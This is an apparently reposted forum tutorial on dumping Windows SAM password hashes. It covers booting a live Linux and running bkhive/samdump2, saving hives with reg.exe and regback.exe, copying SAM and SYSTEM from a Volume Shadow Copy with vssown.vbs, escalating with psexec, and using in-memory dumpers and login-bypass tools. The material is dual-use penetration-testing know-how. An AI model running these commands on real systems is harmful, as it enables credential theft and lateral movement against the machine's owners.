Jump to content
co4ie

Dump Windows password hashes efficiently - Part 1

Recommended Posts

Posted

Slightly modified definition from Wikipedia:

The Security Accounts Manager (SAM) is a registry file in Windows NT and later versions until the most recent Windows 7. It stores users' passwords in a hashed format (in LM hash and NTLM hash). Since a hash function is one-way, this provides some measure of security for the storage of the passwords.

Generally, dumping operating system users' password hashes is a common action following a compromise of a machine: getting access to the password hashes might open the doors to a variety of attacks including, but not limited to, authenticate with the hash over SMB to other systems where passwords are reused, password policy analysis and pattern recognition, password cracking, etc.

Depending on the type of access that you have got to the target, you can retrieve the password hashes from SAM in different ways.

Physical access

Given physical access to the system, typically during a laptop assessment or a successful social engineering engagement, the preferred way to safely dump the password hashes is to power off the machine, enter the BIOS menu at power-on time, review the boot order to allow boot from the optical drive and USB drive before local hard-disk, save the settings and reboot the system with your favourite GNU/Linux live distribution CD or USB stick. Two widely known tools to dump the local users' hashes from the SAM file, given the Windows file system block file, are bkhive and samdump2:

  1. bkhive - dumps the syskey bootkey from a Windows system hive.
  2. samdump2 - dumps Windows 2k/NT/XP/Vista password hashes.

These tools are generally included in many GNU/Linux live distributions. If they're not, make sure to bring a copy of them with you.

Usage:

 # bkhive
bkhive 1.1.1 by Objectif Securite
http://www.objectif-securite.ch
original author: ncuomo@studenti.unina.it

Usage:

bkhive systemhive keyfile


# samdump2
samdump2 1.1.1 by Objectif Securite
http://www.objectif-securite.ch
original author: ncuomo@studenti.unina.it /CODE]

Usage:
[CODE]samdump2 samhive keyfile

Example of retrieving the SAM hashes from a Windows partition /dev/sda1:

 # mkdir -p /mnt/sda1
# mount /dev/sda1 /mnt/sda1
# bkhive /mnt/sda1/Windows/System32/config/SYSTEM /tmp/saved-syskey.txt
# samdump2 /mnt/sda1/Windows/System32/config/SAM /tmp/saved-syskey.txt > /tmp/hashes.txt

In the event that you have not got bkhive or samdump2 with you, you can fall-back to copy the SYSTEM and SAM files from /mnt/sda1/Windows/System32/config to your USB stick and import them to any tool that is able to extract the SAM hashes from them: Cain & Abel, creddump and mimikatz are some available tools.

Bypass login prompt

If you are looking into bypassing the login prompt rather than dumping users' password hashes, some smart people have came up with innovative approaches:

  1. BootRoot is a project presented at Black Hat USA 2005 by researchers Derek Soeder and Ryan Permeh, as an exploration of technology that custom boot sector code can use to subvert the Windows kernel as it loads. The eEye BootRootKit is a boot sector-based NDIS backdoor that demonstrates the implementation of this technology.
  2. SysRQ2 is a bootable CD image that allows a user to open a fully privileged (SYSTEM) command prompt on Windows 2000, Windows XP, and Windows Server 2003 systems by pressing Ctrl+Shift+SysRq at any time after startup. It was first demonstrated at Black Hat USA 2005 by researchers Derek Soeder and Ryan Permeh as an example of applied eEye BootRoot technology. Use the "create CD from ISO image" feature of your preferred CD burning software to create a bootable SysRq CD.
  3. Kon-Boot is an prototype piece of software which allows to change contents of a linux kernel and Windows kernel on the fly (while booting). In the current compilation state it allows to log into a linux system as root user without typing the correct password or to elevate privileges from current user to root. For Windows systems it allows to enter any password protected profile without any knowledge of the password.

Password reset

Alternatively you can boot the machine with the bootdisk live CD or USB stick and use the chntpw utility to reset any Windows local user's credentials.

Post-exploitation scenario

The typical scenario here is that you have compromised a Windows machine by any means and have got shell access as an administrative user. Firstly, you need to escalate your privileges to SYSTEM user. A simple way is to use Sysinternals' PsExec utility:

  C:\>psexec.exe -i -s cmd.exe

Although, there are several other techniques too, but this is outside of the scope of this post.

Legacy techniques

On Windows NT and Windows 2000 systems you can use MSbackup utility part of the MS-DOS subsystem: Backup the system state into a file locally on the machine you have compromised, then using MSbackup again, restore the system state stuff to a local directory without preserving the security. Once complete, you will have the SAM and SYSTEM files. You need about 280Mb for the initial backup - typical for a Windows 2000 with current service packs and hot fixes.

Another solution is to use regback.exe part of the Windows 2000 Resource Kit Tools. This is slightly easier as it only dumps the specific files:

C:\>regback.exe C:\backtemp\SAM machine sam
C:\>regback.exe C:\backtemp\SYSTEM machine system

If you cannot get regback.exe to work, on Windows XP and above systems use regedit.exe or reg.exe. Using reg.exe:

C:\>reg.exe save HKLM\SAM sam
The operation completed successfully
C:\>reg.exe save HKLM\SYSTEM sys
The operation completed successfully

Using regedit.exe:

  1. Execute regedit.exe from Start / Run prompt.
  2. Open up Computer\HKEY_LOCAL_MACHINE and right-click the SAM section and select Export.
  3. Change the Save as type setting to Registry Hive Files and save as SAM.
  4. Same steps with SYSTEM hive.

Lastly, you can also get the SAM and SYSTEM files from C:\Windows\repair\. Although this directory contains outdated copies of the original C:\Windows\System32\config\ files so it might not reflect the current users' credentials.

Volume Shadow Copies technique

This technique is fairly recent and was first illustrated by Tim Tomes. It consists of abusing the Volume Shadow Copies functionality in modern Windows operating systems to access protected system files like C:\Windows\System32\config's SAM and SYSTEM.

You can use the Volume Shadow Copy Management command line interface, vssown, to leverage this technique as follows.

List shadow copies:

    C:\>cscript vssown.vbs /list
Microsoft (R) Windows Script Host Version 5.8
Copyright (C) Microsoft Corporation. All rights reserved.

SHADOW COPIES
=============

As expected, no shadow copies initially.

Verify the status of the Volume Shadow Service (VSS):

    C:\>cscript vssown.vbs /status
Microsoft (R) Windows Script Host Version 5.8
Copyright (C) Microsoft Corporation. All rights reserved.

[*] Stopped

C:\>cscript vssown.vbs /mode
Microsoft (R) Windows Script Host Version 5.8
Copyright (C) Microsoft Corporation. All rights reserved.

[*] VSS service set to 'Manual' start mode.

In this case, once we are done, we need to restore it to the initial state (Stopped).

Create a new shadow copy:

C:\>cscript vssown.vbs /create
Microsoft (R) Windows Script Host Version 5.8
Copyright (C) Microsoft Corporation. All rights reserved.

[*] Attempting to create a shadow copy.

Verify that the shadow copy has been created:

C:\>cscript vssown.vbs /list
Microsoft (R) Windows Script Host Version 5.8
Copyright (C) Microsoft Corporation. All rights reserved.

SHADOW COPIES
=============

[*] ID: {D79A4E73-CCAB-4151-B726-55F6C5C3A853}
[*] Client accessible: True
[*] Count: 1
[*] Device object: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
[*] Differnetial: True
[*] Exposed locally: False
[*] Exposed name:
[*] Exposed remotely: False
[*] Hardware assisted: False
[*] Imported: False
[*] No auto release: True
[*] Not surfaced: False
[*] No writers: True
[*] Originating machine: LAPTOP
[*] Persistent: True
[*] Plex: False
[*] Provider ID: {B5946137-7B9F-4925-AF80-51ABD60B20D5}
[*] Service machine: LAPTOP
[*] Set ID: {018D7854-5A28-42AE-8B10-99138C37112F}
[*] State: 12
[*] Transportable: False
[*] Volume name: \\?\Volume{46f5ef63-8cca-11e0-88ac-806e6f6e6963}\

You need to take note of the Device object value for the next step and the ID for the cleanup step.

Pull the following files from a shadow copy:

C:\>copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM .C:\>copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM .

You have just copied over SAM and SYSTEM files from the shadow copy to the C:\ root folder.

Cleanup:

C:\>cscript vssown.vbs /delete {D79A4E73-CCAB-4151-B726-55F6C5C3A853}

Microsoft (R) Windows Script Host Version 5.8Copyright (C) Microsoft Corporation. All rights reserved.

[*] Attempting to delete shadow copy with ID: {D79A4E73-CCAB-4151-B726-55F6C5C3A853}

Eventually, restore to original Stop status:

    C:\>cscript vssown.vbs /stop

Microsoft (R) Windows Script Host Version 5.8Copyright (C) Microsoft Corporation. All rights reserved.

[*] Signal sent to stop the VSS service.

In-memory technique

The concept behind in-memory dump of SAM hashes it to inject a DLL into the LSASS system process or, generally speaking, parsing the memory for specific patterns and inspect these memory pages' content. The former action can lead to a Blue Screen of Death (BSoD) condition following a crash of the LSASS process therefore this action is not recommended on production environments: prefer registry hive copy (regback.exe and reg.exe/regedit.exe) and Volume Shadow Copies techniques instead. Nevertheless, in some specific instances, the in-memory technique is required.

The most widely known standalone tool to dump SAM hashes is probably fgdump, the successor of pwdump6, both tools developed by the foofus team. The main advantage of fgdump over pwdump6 is that it works on Windows Vista and later versions. Although, I have seen them both failing under some circumstances. More reliable tools include pwdump7 from Andres Tarasco and the gsecdump from TrueSec. The former works on both 32-bit and 64-bit systems across all versions of Windows, but has some problems when run on domain controllers and the latter does not work on 64-bit systems, but is reliable against modern Windows operating systems including Windows Server 2008 domain controllers 32-bit. Despite not working on 64-bit systems, another popular and reliable tool is PWDumpX by Reed Arvin.

The Metasploit Framework also has its own post-exploitation modules, Meterpreter built-in command and dated Meterpreter script to dump the SAM hashes. Details on how these pieces of code work within the framework and which techniques they implement can be found on these blog posts by HD Moore.

Needless to say that there are more options and knowledge of which one to use within the target environment is important. In order to facilitate this task, I have listed the relevant tools, their capabilities, where they do work and, most importantly, where they are known to fail on this spread-sheet.

Sursa

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...